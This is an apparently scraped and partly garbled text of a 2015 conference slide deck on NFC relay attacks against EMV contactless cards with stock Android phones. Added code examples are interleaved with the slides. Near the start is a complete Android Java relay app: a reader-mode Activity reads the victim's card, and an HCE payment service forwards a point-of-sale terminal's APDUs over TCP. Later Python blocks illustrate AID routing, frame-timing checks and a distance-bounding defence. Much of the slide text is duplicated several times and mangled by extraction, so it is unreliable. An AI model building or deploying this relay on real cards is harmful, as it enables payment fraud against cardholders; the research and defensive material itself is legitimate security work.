This means you need to declare in advance which AIDs you handle.
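Both halves of the passive APDU relay that the Reader/Writer (III) and HCE (IV) slides describe, written out as an added example; this is neither the authors' ±2000 LOC app nor AOSP code. The dishonest verifier enables reader mode from an Activity, opens the victim's card as IsoDep and answers every command that arrives over the relay channel with the card's genuine response; the dishonest prover is a HostApduService bound to the honest prover's AID, which forwards each C-APDU coming from the PoS and replies with the relayed R-APDU asynchronously (processCommandApdu runs on the main thread, where socket I/O is not allowed). The package name, the TCP channel, host, port, the 2-byte length framing and the manifest/XML fragments in the comments are assumptions; the AID itself is whatever the real card's application uses and must be known in advance (Limitation 2). The verifier side uses NfcAdapter.enableReaderMode (API level 19); on older releases the same loop can be driven from foreground dispatch, which is why the slides only require Android ≥ 4.4 on the prover.

```java
// --- ApduChannel.java: relay channel shared by both phones (added example, assumed framing) ---
package net.example.relay;
import java.io.*;
import java.net.Socket;
/** Each APDU crosses the TCP channel as a 16-bit big-endian length followed by its bytes. */
final class ApduChannel {
    private final DataInputStream in;
    private final DataOutputStream out;
    ApduChannel(Socket s) throws IOException {
        in = new DataInputStream(s.getInputStream());
        out = new DataOutputStream(s.getOutputStream());
    }
    void send(byte[] apdu) throws IOException {
        out.writeShort(apdu.length);  // even extended-length APDUs fit in 16 bits
        out.write(apdu);
        out.flush();
    }
    byte[] receive() throws IOException {
        byte[] apdu = new byte[in.readUnsignedShort()];
        in.readFully(apdu);           // blocks until the peer answers or the socket dies
        return apdu;
    }
}

// --- VerifierActivity.java: dishonest verifier in Reader/Writer mode ---
package net.example.relay;
import android.app.Activity;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import java.io.IOException;
import java.net.Socket;
public class VerifierActivity extends Activity implements NfcAdapter.ReaderCallback {
    static final String PROVER_HOST = "192.0.2.10"; // assumption: the prover phone's address
    static final int PROVER_PORT = 4444;            // assumption
    @Override protected void onResume() {
        super.onResume();
        // Reader mode needs an Activity (slide III). Ask for ISO 14443 A/B only and skip the
        // NDEF check so the NFC service does not dispatch the card to another app.
        NfcAdapter.getDefaultAdapter(this).enableReaderMode(this, this,
            NfcAdapter.FLAG_READER_NFC_A | NfcAdapter.FLAG_READER_NFC_B
            | NfcAdapter.FLAG_READER_SKIP_NDEF_CHECK, null);
    }
    @Override protected void onPause() { super.onPause(); NfcAdapter.getDefaultAdapter(this).disableReaderMode(this); }
    /** Runs on a binder thread, so blocking I/O is fine here. */
    @Override public void onTagDiscovered(Tag tag) {
        IsoDep card = IsoDep.get(tag);
        if (card == null) return;                   // not ISO/IEC 14443-4; EMV cards always are
        try (Socket s = new Socket(PROVER_HOST, PROVER_PORT)) {
            ApduChannel relay = new ApduChannel(s);
            card.connect();
            card.setTimeout(5000);                  // about the FWT ceiling (Limitation 3)
            while (card.isConnected()) {
                byte[] cmd = relay.receive();       // C-APDU the PoS sent to the prover phone
                relay.send(card.transceive(cmd));   // R-APDU from the victim's real card
            }
        } catch (IOException e) { /* card left the field or channel dropped: the PoS times out */ }
    }
}

// --- ProverService.java: dishonest prover in HCE mode (Android >= 4.4) ---
// Manifest (assumed): <service android:permission="android.permission.BIND_NFC_SERVICE"> with an
// intent-filter for android.nfc.cardemulation.action.HOST_APDU_SERVICE and <meta-data
// android:name="android.nfc.cardemulation.host_apdu_service" android:resource="@xml/apduservice"/>;
// res/xml/apduservice.xml lists the honest prover's AID in advance (Limitation 2):
// <aid-group android:category="payment"><aid-filter android:name="[AID]"/></aid-group>
package net.example.relay;
import android.nfc.cardemulation.HostApduService;
import android.os.Bundle;
import java.io.IOException;
import java.net.ServerSocket;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
public class ProverService extends HostApduService {
    private static final byte[] SW_UNKNOWN = {(byte) 0x6F, 0x00}; // ISO 7816-4 "no precise diagnosis"
    private final ExecutorService io = Executors.newSingleThreadExecutor(); // preserves APDU order
    private ApduChannel relay;                      // touched only from the io thread
    @Override public void onCreate() {
        super.onCreate();
        io.execute(() -> {                          // queued before any APDU task
            try (ServerSocket srv = new ServerSocket(VerifierActivity.PROVER_PORT)) {
                relay = new ApduChannel(srv.accept()); // closing srv keeps the accepted socket open
            } catch (IOException e) { /* no channel: every APDU gets 6F00 */ }
        });
    }
    /** Called on the main thread for each C-APDU the PoS addresses to our AID. */
    @Override public byte[] processCommandApdu(byte[] commandApdu, Bundle extras) {
        io.execute(() -> {                          // socket I/O on the main thread would throw
            byte[] rsp = SW_UNKNOWN;
            if (relay != null) {
                try { relay.send(commandApdu); rsp = relay.receive(); }
                catch (IOException e) { /* answer 6F00 */ }
            }
            sendResponseApdu(rsp);
        });
        return null;                                // null: reply later via sendResponseApdu()
    }
    @Override public void onDeactivated(int reason) { /* field lost or another AID selected */ }
}
```

Tapping the victim's card on the verifier phone and the prover phone on the PoS completes the mafia-fraud setup from the Background section: the PoS sees its SELECT by AID answered by the genuine card, only later than usual. Each APDU costs one round trip over the channel, which is the delay that Limitation 3 bounds with the FWT.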

Android and NFC: A Tale of L♥ve (V). Digging into the Android NFC stack: Summary

Layer                                                    Language(s)   Dependency                  OSS
NFC developer framework (android.nfc / com.android.nfc)  Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)            C/C++         Manufacturer                Yes
NFC Android kernel driver                                C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)         ARM Thumb     Hardware and manufacturer   No

Some useful links:
    https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
    https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
    https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
    https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
    http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
    http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
    Broadcom BCM20793S and BCM20793SKMLG datasheets on datasheet4u.com (PDF ids 845670 and 845671)

Android and NFC: A Tale of L♥ve (VI). Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic
    libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
    Caused by the CRC computation performed by the NFCC
    Can be overcome if the NFCC is modified
    EMV contactless cards are IsoDep (fully ISO/IEC 14443-4 compliant), so this limitation does not affect them

Limitation 2: the dishonest prover communicates with an honest verifier (device in HCE mode)
    The AID must be known in advance
    Can be overcome if the device is rooted
    The Xposed framework may help to overcome this issue, but it needs root permissions


Android and NFC: A Tale of L♥ve (VII). Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel
    ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, with 0 ≤ FWI ≤ 14 and fc = 13.56 MHz
    Since 256 · 16/fc = 4096/13.56 MHz ≈ 302 µs, FWT ∈ [≈302 µs, ≈4.95 s] → a relay is theoretically possible when the added delay is ≤ ≈5 s

Concluding remarks
    Any NFC-enabled device running OTS Android ≥ 4.4 can perform a passive NFC relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
    Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice!


Relay Attack Implementation (I). Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II). Threat Scenarios: Scenario 1, Distributed Mafia Fraud

(Figure on the slide: a BOTMASTER controlling several BOTs.)

Relay Attack Implementation (III). Threat Scenarios: Scenario 2, Hiding Fraud Locations

Relay Attack Implementation (IV). Resistant Mechanisms

Brief summary of resistant mechanisms:

Distance-bounding protocols
    Upper-bound the physical distance using the round-trip time of cryptographic challenge-response messages

Timing constraints
    Not enforced in current NFC-capable systems
    The protocol itself allows waiting time extension requests (S(WTX) blocks in ISO/IEC 14443-4)

Physical countermeasures
    Whitelisting/blacklisting: random UID in HCE mode → unfeasible
    RFID blocking covers
    Physical button/switch activation
    Secondary authentication methods (e.g. on-card fingerprint scanners)


Related Work. On relay attacks

2005-2009: first works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: relay attacks on Android accessing Secure Elements
    A SE securely stores the data associated with credit/debit cards
    Needs a non-OTS Android device
2014: active relay attacks with custom hardware and custom Android firmware

Several works studied the delay over the relay channel
    Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 29: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC: A Tale of L♥ve (II). Digging into the Android NFC stack

- Event-driven framework, nice API support
- Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
- NXP dropped in favour of NCI:
  - Open architecture, not focused on a single chip family
  - Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  - Standard proposed by the NFC Forum

J. Vila, R. J. Rodríguez. Relay Attacks in EMV Contactless Cards with Android OTS Devices. HITB'15 AMS, slide 19/36

Android and NFC: A Tale of L♥ve (III). Digging into the Android NFC stack: Reader/Writer mode

- Not allowed to be set directly → tied to an Android activity
- The Android NFC service selects apps according to the tag definition in their Manifest file
- At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier

[Figure: path of a transceive() call in Reader/Writer mode. NFC developer framework: User App → Tag → NfcService (mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → System NFC Library: NativeNfcTag.cpp → libnfc-nci]

Android and NFC: A Tale of L♥ve (IV). Digging into the Android NFC stack: HCE mode

- A service must be implemented to process commands and replies: the HostApduService abstract class and its processCommandApdu method
- AID-based routing (service table): this means you need to declare in advance which AID you handle
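An added example (not from the talk or the authors' app) of the AID-based routing the slide describes: a small parser for the SELECT-by-AID command APDU and an exact-match routing table, which is how Android 4.4 HCE decides whether any service sees the command at all. The RoutingTable class, the service labels and the proprietary-range AID values are constructed for this illustration.

```python
# Added example (not from the talk or the authors' app): how Android HCE decides
# which service receives a SELECT-by-AID APDU. RoutingTable, the service labels
# and the AID values below are constructed for this illustration.

SELECT_BY_NAME = bytes.fromhex("00A40400")  # CLA=00 INS=A4 P1=04 (select by DF name) P2=00


def parse_select_aid(apdu: bytes):
    """Return the AID carried by a SELECT-by-name command APDU, or None for anything else.

    Layout: CLA INS P1 P2 Lc <AID, 5..16 bytes> [Le]. A truncated body is rejected."""
    if len(apdu) < 5 or apdu[:4] != SELECT_BY_NAME:
        return None
    lc = apdu[4]
    if not 5 <= lc <= 16 or len(apdu) < 5 + lc:
        return None
    return apdu[5:5 + lc]


class RoutingTable:
    """AID -> service map; on a real device the entries come from each app's manifest,
    which is why a service must declare in advance which AIDs it handles."""

    def __init__(self):
        self._routes = {}

    def register(self, aid_hex: str, service: str):
        self._routes[bytes.fromhex(aid_hex)] = service

    def route(self, apdu: bytes):
        """Service that receives this SELECT, or None: a SELECT for an AID nobody
        registered is never delivered to any app."""
        aid = parse_select_aid(apdu)
        if aid is None:
            return None  # non-SELECT APDUs follow the service selected earlier (not modelled here)
        return self._routes.get(aid)  # Android 4.4 matches registered AIDs exactly


def demo_table() -> RoutingTable:
    """Two constructed proprietary-range AIDs (F0... prefix) registered by two services."""
    table = RoutingTable()
    table.register("F0010203040506", "service-a")
    table.register("F0A1B2C3D4E5F6", "service-b")
    return table


if __name__ == "__main__":
    table = demo_table()
    for apdu_hex in ("00A4040007F001020304050600",   # SELECT service-a's AID
                     "00A4040007F0A1B2C3D4E5F600",   # SELECT service-b's AID
                     "00A4040007F001020304059900",   # SELECT an AID nobody registered
                     "00B2010C00"):                  # READ RECORD: not a SELECT at all
        print(apdu_hex, "->", table.route(bytes.fromhex(apdu_hex)))
```

The table is keyed by the full AID, so a service that has not registered the exact AID the terminal selects is simply never reached; that is the whole content of Limitation 2 later in the talk.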

Android and NFC: A Tale of L♥ve (V). Digging into the Android NFC stack: Summary

Description                                          Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)    Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)        C/C++         Manufacturer                Yes
NFC Android kernel driver                            C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)     ARM Thumb     Hardware and manufacturer   No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI). Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic
- libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
- Caused by the CRC computation performed by the NFCC
- Overcome if the NFCC is modified
- EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: the dishonest prover communicates with an honest verifier
- Device in HCE mode: the AID must be known in advance
- Overcome if the device is rooted
- The Xposed framework may help to overcome this issue, but it needs root permissions

Android and NFC: A Tale of L♥ve (V). Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel
- ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
- FWT ∈ [500 µs, 5 s] → a relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
- Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
- Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice!
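An added example (not from the talk) that works the Frame Waiting Time formula above through: it tabulates FWT for every FWI, reads the FWI a card advertises in its ATS, and applies a constructed terminal-side policy on that value. Note that the formula gives about 302 µs at FWI = 0 (the slide's 500 µs is a rough figure) and about 4.95 s at FWI = 14, which is the 5 s the slide quotes. The ATS bytes and the policy threshold are constructed values, not taken from any real card or terminal.

```python
# Added example (not from the talk): the Frame Waiting Time formula from the slide,
# extracting FWI from a card's ATS, and a terminal-side check on the advertised
# waiting time. The ATS bytes and the policy threshold are constructed values.

FC_HZ = 13.56e6  # fc, the ISO/IEC 14443 carrier frequency


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI, per ISO/IEC 14443-4, for 0 <= FWI <= 14."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwi_from_ats(ats: bytes):
    """FWI declared in an ISO/IEC 14443-4 ATS, or None if the ATS is malformed.

    Layout: TL (total length incl. TL), T0 (bit5 -> TA(1) present, bit6 -> TB(1) present,
    bit7 -> TC(1) present), then the present interface bytes. TB(1) carries FWI in its
    upper nibble and SFGI in the lower one; when TB(1) is absent the default FWI is 4."""
    if len(ats) < 2 or ats[0] != len(ats):
        return None
    t0 = ats[1]
    idx = 2
    if t0 & 0x10:      # skip TA(1)
        idx += 1
    if not t0 & 0x20:  # no TB(1)
        return 4
    if idx >= len(ats):
        return None
    return ats[idx] >> 4


def accept_card(ats: bytes, max_fwi: int = 7):
    """Constructed terminal policy: reject cards whose advertised FWT is long enough to
    absorb a relay hop. Returns (accepted, reason)."""
    fwi = fwi_from_ats(ats)
    if fwi is None:
        return False, "malformed ATS"
    fwt_ms = fwt_seconds(fwi) * 1e3
    if fwi > max_fwi:
        return False, f"FWI={fwi} allows {fwt_ms:.1f} ms per frame, above policy"
    return True, f"FWI={fwi} ({fwt_ms:.2f} ms per frame)"


if __name__ == "__main__":
    for fwi in range(15):
        print(f"FWI={fwi:2d}  FWT={fwt_seconds(fwi) * 1e3:10.3f} ms")
    # Constructed ATS: TL=05, T0=78 (TA,TB,TC present, FSCI=8), TA=80, TB=70 (FWI=7), TC=02
    print(accept_card(bytes.fromhex("0578807002")))
    # Same card shape but TB=E0, i.e. FWI=14: nearly 5 s of slack per frame
    print(accept_card(bytes.fromhex("057880E002")))
```

A cap on FWI only bounds a single reply: the timing-extension request the talk mentions under resistant mechanisms (S(WTX) in ISO/IEC 14443-4) lets the card ask for more time on every frame, so a terminal that wanted to enforce timing would also have to bound those, which is exactly the sense in which the talk says timing constraints are not enforced today.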


Relay Attack Implementation (I). Experiment configuration

- PoS device: Ingenico IWL280 with GPRS + NFC support
- Android app developed (±2000 LOC)
- Two OTS Android NFC-capable devices
- One constraint: only the dishonest prover must run Android ≥ 4.4

Relay Attack Implementation (II). Threat Scenarios: Scenario 1, Distributed Mafia Fraud

[Figure: a BOTMASTER coordinating several BOTs]

Relay Attack Implementation (III). Threat Scenarios: Scenario 2, Hiding Fraud Locations

Relay Attack Implementation (IV). Resistant Mechanisms

Brief summary of resistant mechanisms:
- Distance-bounding protocols: upper-bounding the physical distance using the round-trip time of cryptographic challenge-response messages
- Timing constraints: not enforced in current NFC-capable systems, and the protocol itself allows timing-extension commands
- Physical countermeasures:
  - Whitelisting/blacklisting: random UID in HCE mode → unfeasible
  - RFID blocking covers
  - Physical button/switch activation
  - Secondary authentication methods (e.g. on-card fingerprint scanners)
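An added example (not from the talk) of the first mechanism in the list, distance bounding: a simplified Hancke-Kuhn style exchange in which both sides derive response bits from a shared key and nonces, then run a rapid phase of one-bit challenges whose round-trip time the verifier bounds. Real radio timing is replaced by a deterministic delay model, so the block shows both sides' messages and why an answer that travels through a relay hop fails the bound even when every response bit is correct. The key, the delays and the RTT bound are constructed values, and the protocol is illustrative, not a certified design.

```python
import hashlib
import hmac
import secrets

# Added example (not from the talk): a Hancke-Kuhn style distance-bounding
# exchange simulated with a deterministic delay model. Keys, delays and the
# RTT bound are constructed values for this illustration.

N_ROUNDS = 32
RTT_BOUND_S = 10e-6   # 10 us: comfortable for a card in the field, hopeless for a relay over a network
DEMO_KEY = b"\x01" * 16    # constructed shared key (card and verifier)
WRONG_KEY = b"\x02" * 16   # constructed key of a party that does not know the secret


def _response_bits(key: bytes, nv: bytes, np: bytes):
    """Both sides derive two n-bit registers R0, R1 from the shared key and both nonces."""
    digest = hmac.new(key, nv + np, hashlib.sha256).digest()
    bits = [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(2 * N_ROUNDS)]
    return bits[:N_ROUNDS], bits[N_ROUNDS:]


class Prover:
    """The card side. one_way_delay_s models the path between the verifier and whatever
    actually answers: ~0 for a card in the reader field, tens of ms when the answer has
    to cross a relay channel first."""

    def __init__(self, key: bytes, one_way_delay_s: float, processing_s: float = 1e-6):
        self.key = key
        self.delay = one_way_delay_s
        self.processing = processing_s
        self.r0 = self.r1 = None

    def slow_phase(self, nv: bytes) -> bytes:
        """Receive the verifier nonce, return the prover nonce, precompute R0/R1."""
        self.np = secrets.token_bytes(8)
        self.r0, self.r1 = _response_bits(self.key, nv, self.np)
        return self.np

    def fast_phase(self, i: int, challenge_bit: int):
        """One rapid round: answer R0[i] or R1[i] depending on the challenge bit.
        Returns (response_bit, round-trip time as the verifier would measure it)."""
        bit = self.r1[i] if challenge_bit else self.r0[i]
        return bit, 2 * self.delay + self.processing


def verify_distance(verifier_key: bytes, prover: Prover):
    """Verifier side: slow phase, then N_ROUNDS single-bit challenges, each checked for
    correctness and for round-trip time against RTT_BOUND_S."""
    nv = secrets.token_bytes(8)
    np = prover.slow_phase(nv)
    r0, r1 = _response_bits(verifier_key, nv, np)
    wrong_bits = 0
    max_rtt = 0.0
    for i in range(N_ROUNDS):
        c = secrets.randbits(1)
        bit, rtt = prover.fast_phase(i, c)
        expected = r1[i] if c else r0[i]
        wrong_bits += bit != expected
        max_rtt = max(max_rtt, rtt)
    accepted = wrong_bits == 0 and max_rtt <= RTT_BOUND_S
    return {"accepted": accepted, "wrong_bits": wrong_bits, "max_rtt_s": max_rtt}


if __name__ == "__main__":
    print("card in the field:   ", verify_distance(DEMO_KEY, Prover(DEMO_KEY, 0.0)))
    print("relayed (20 ms hop): ", verify_distance(DEMO_KEY, Prover(DEMO_KEY, 20e-3)))
    print("wrong key:           ", verify_distance(DEMO_KEY, Prover(WRONG_KEY, 0.0)))
```

The point the simulation makes is the one the slide makes: the relayed prover knows the key and answers every bit correctly, and is rejected purely on time. A deployment needs the rapid phase timed in hardware at the NFC controller, since, as the talk notes for HCE, the Android stack above it enforces no timing at all.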


Related Work. On relay attacks

- 2005-2009: first works, built on specific hardware
- 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
- 2012-2013: relay attacks on Android accessing Secure Elements
  - An SE securely stores data associated with credit/debit cards
  - Needs a non-OTS Android device
- 2014: active relay attacks with custom hardware and custom Android firmware
- Several works studied the delay upon the relay channel: relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

- Security of NFC is based on the physical proximity concern
- NFC threats: eavesdropping, data modification, relay attacks
- Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity
- Conclusions:
  - Review of the Android NFC stack
  - Proof-of-concept of relay attacks using Android OTS devices
  - Threat scenarios introduced
  - Virtual pickpocketing attacks may appear before long

Conclusions (II)

But then, what the hell can I do? Should I run away?

Conclusions (III)

Future work:
- Develop a botnet infrastructure and earn money
- Timing constraints of Android HCE mode
- Try active relay attacks within EMV contactless cards

Acknowledgments:
- Spanish National Cybersecurity Institute (INCIBE)
- University of León under contract X43
- HITB staff

And thanks to all for hearing us!
Visit http://vwzq.net/relaynfc for more info about the project

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 30: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

